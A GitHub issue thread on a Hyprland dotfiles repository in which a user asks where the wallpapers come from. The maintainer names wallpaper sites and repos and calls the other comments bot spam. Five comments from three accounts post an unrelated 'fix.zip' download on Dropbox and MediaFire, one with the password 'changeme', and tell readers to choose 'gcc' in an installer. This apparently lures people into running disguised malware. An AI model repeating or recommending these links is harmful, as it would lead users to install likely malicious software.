### ISSUE TITLE
Just a question: Wallpapers

### ISSUE THREAD

**Issue by eaxly** [iamhrigved/Hyprdots#1]
Where tf do you get these wallpapers from? And why are they so GODDAMN BEAUTIFUL!!

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by iamhrigved** [comment]
@eaxly Thanks bro! I got some of the wallpapers from websites like [wallhaven](https://wallhaven.cc) and [wallpapers.com](https://wallpapers.com) and some of them are from these repos: [aesthetic-wallpapers](https://github.com/zDyanTB/aesthetic-wallpapers) and [Wallpaper-Bank](https://github.com/JaKooLit/Wallpaper-Bank)

Btw these stupid comments are from bots I guess. Don't go to these sites.

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
